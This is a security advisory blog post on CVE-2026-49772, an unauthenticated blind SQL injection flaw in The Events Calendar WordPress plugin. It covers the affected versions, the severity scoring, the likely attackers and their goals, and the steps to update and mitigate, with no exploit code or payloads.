The Events Calendar CVE-2026-49772: Unauth SQL Injection, Patch Now
The Events Calendar, a WordPress plugin on 700,000+ sites, has a critical flaw (CVE-2026-49772, severity 9.3) that lets anyone read the database with no login. Here are the affected versions, how to check your site, and how to update to 6.16.3 now.
Makoto Horikawa
Backend Engineer / AWS / Django
The Events Calendar, a WordPress plugin on 700,000+ sites, has a critical flaw (CVE-2026-49772, severity 9.3) that lets anyone read the database with no login. Here are the affected versions, how to check your site, and how to update to 6.16.3 now.
A serious vulnerability has been found in The Events Calendar, a popular WordPress plugin used by sites worldwide to display event schedules and calendars. It is tracked as CVE-2026-49772. A third party with no account on the site at all can send a crafted request and read the contents of the database directly.
The plugin is installed on more than 700,000 sites through the official directory, so the blast radius is very wide. The severity is rated 9.3 out of 10, classified as "critical." The developer, StellarWP, has already shipped a fix (version 6.16.3), and the current latest version is 6.16.4. If you are running an older version, update now.
✓ What we know so far
- ✓Affected is the WordPress plugin "The Events Calendar," versions 6.15.12 through 6.16.2 (Patchstack)
- ✓The type is SQL injection (CWE-89), where crafted input lets an attacker manipulate the database. It is a "blind SQL injection" that reads results out one piece at a time from the response
- ✓Exploitation requires no login (unauthenticated) and is reachable over the internet. Severity is 9.3 (critical) out of 10 (NVD)
- ✓The fix shipped in 6.16.3 (latest is 6.16.4). It was found by security researcher "vtim" and reported via Patchstack. No confirmed reports of exploitation in the wild so far
What is The Events Calendar?
The Events Calendar is a plugin that adds an "event list" and "calendar view" to a WordPress site. It is used to show seminars, exhibitions, events run by local governments and nonprofits, store campaigns, and class schedules in a browser-based calendar or list. The developer, StellarWP (part of Liquid Web / Nexcess in the US), makes many staple tools for WordPress, and The Events Calendar is among its flagship products, installed on more than 700,000 sites. There is a free version plus paid versions that add features such as ticket sales.
A plugin is an "add-on part" that bolts extra features onto WordPress core. Convenient, but a single hole in one of those parts puts the whole site at risk. What makes this flaw nasty is that the attack needs no login at all. A complete stranger who is neither a member nor an administrator can pull it off just by sending a calendar-related request from outside. WordPress sites are said to power over 40% of the web, and an unauthenticated hole in a popular plugin like this is a prime target for mass automated attacks that sweep through sites worldwide one after another.
A back door to the records cabinet, left unlocked on 700,000 sites at once
The first to chase this hole are not people with a personal grudge. They are bot operators who scan the whole internet for vulnerable sites, resale gangs who sell stolen lists on underground markets, initial access brokers who probe for entry points and sell them to ransomware crews, and spam and scam outfits hungry for event attendees' contact details. What they want is not how the site looks, but what sits in the database behind it: the names and email addresses of members and event attendees, the contact and payment details of ticket buyers, the hashed passwords of administrator accounts, and the site's secret keys used to forge a logged-in state. The moment CVE-2026-49772 is exploited, these lists and keys are siphoned straight out of the database without ever passing the login screen.
What happens next does not end with a single leak. A stolen attendee list is first resold on underground markets, and then phishing emails dressed up as "the event has been canceled" or "we are refunding your fee" are sent to that very list. Wrapped in a familiar event context, those fake messages are hard to tell from the real thing, and recipients end up entering their details into a fake payment page. The attacker also takes the stolen, hashed administrator passwords, cracks them over time, and seizes the WordPress dashboard itself. From there the site gets defaced, turned into a launch pad for serving malware to visitors, or made the entry point for ransomware.
And the responsibility for this whole chain falls back on whoever runs the site. The local government, nonprofit, class, or shop hosting the event is the party holding attendees' personal data. If a leak occurs, they are required to report it to the data protection authority and notify the people affected, and they carry the heavy burden of inquiry handling and lost trust. The figure "9.3" does not capture this kind of loss — where the site never goes down, yet the entrusted list is quietly drained away. The smaller the operation, with no dedicated staff, the harder the breach is to notice, and whether you can apply the update now is what decides your attendees' safety.
CVE-2026-49772: querying the database directly with crafted input
According to the Patchstack advisory and the NVD record, CVE-2026-49772 is a SQL injection (CWE-89) in The Events Calendar. SQL injection is a flaw that arises when a site mixes user-supplied strings straight into the statements (SQL) it sends to its database. The attacker slips commands to the database — rather than ordinary data — into an input field or URL parameter, making the site run queries it never intended. Here the result is not shown directly on the page, so it is classified as "blind SQL injection," where the contents are inferred and extracted one character at a time from differences in the response (success or failure, shown or not).
The technical scoring (CVSS vector) is AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L, for a score of 9.3. In short: "over the internet (AV:N), under simple conditions (AC:L), with no login (PR:N) and no user interaction (UI:N), the impact reaches beyond the plugin to the whole site (S:C), and the database information can be read (C:H)." The combination to watch is PR:N (no privileges) and AV:N (network reachable) — unauthenticated and reachable by anyone over the internet, the conditions most prone to exploitation. Data tampering (I:N) is not directly in scope, but using the stolen administrator data as a foothold can ultimately lead to a full takeover of the site.
Affected versions and how to check your own site
What you are exposed to and what to do depend on the version you are running. In the WordPress dashboard, open "Plugins" and check the version number of The Events Calendar. Use the table below to find your situation, then update to 6.16.3 or later.
| Version in use | Status | What to do |
|---|---|---|
| 6.15.12 – 6.16.2 | At risk (vulnerable) | Update to 6.16.3+ immediately |
| 6.15.11 or earlier | Check (other known flaws) | Update to the latest version |
| 6.16.3 | Patched | No action (latest recommended) |
| 6.16.4 (latest) | Safe | No action |
The Events Calendar also has a paid extension (The Events Calendar Pro) and a ticketing feature (Event Tickets). Because the free core is what is affected here, sites that run the extensions still need to bring the core up to 6.16.3 or later. Sites that use ticket sales should treat this as higher priority, since buyers' personal data lives in the database.
What to do right now
The top priority is updating the plugin. In the WordPress dashboard, open "Plugins" → "Updates" and update The Events Calendar to 6.16.3 or later (ideally the latest 6.16.4). Sites with auto-updates enabled may already be patched, but it is worth checking the version number by eye to be sure. If you manage multiple sites, list each site's version in your management tool and flag anything on 6.16.2 or earlier.
If you cannot update right away, one stopgap is to block SQL-injection-like requests with a WAF (web application firewall). Virtual patching from Patchstack or a security plugin can buy time until you update the core. This is only a temporary measure, though — the real fix is updating the plugin itself. After updating, it is also worth checking for suspicious login history, database anomalies, and unfamiliar administrator accounts.
Because WordPress plugins like The Events Calendar share the same parts across the world, one hole means many sites get targeted at once. Knowing where each plugin you use came from and when it was last updated is the first step to preventing this kind of chain reaction. We publish an OSS supply chain scanner that lets you check across open-source components for reported vulnerabilities. For the latest status on flaws confirmed to be under active attack, see our CISA KEV dashboard. CVE-2026-49772 is not on the KEV list (the US CISA catalog of vulnerabilities under active attack) as of now, but because it is the kind of unauthenticated flaw prone to mass exploitation, it is safer to act without waiting for it to be listed.
Popular WordPress plugins keep getting targeted
Vulnerabilities in widely installed WordPress plugins have been reported extremely often of late. We have covered the actively exploited flaw in "Kirki" (CVE-2026-8206, 500,000 sites), where a password-reset weakness let attackers hijack administrators; a roundup of "Gravity Forms" and others, a staple form builder that shipped four flaws at once; and the flaw in "WPCode" (CVE-2026-8832), which allowed code execution from an editor-level account.
What these share is a pattern: an add-on installed for convenience quietly became an entry point. Unauthenticated flaws in particular pair well with automated attacks that mechanically sweep sites worldwide, and the time from disclosure to first exploitation keeps shrinking. Installing plugins is not the problem; the problem is leaving them un-updated afterward. Let CVE-2026-49772 be the prompt to take inventory of the plugins on your site and review your auto-update settings.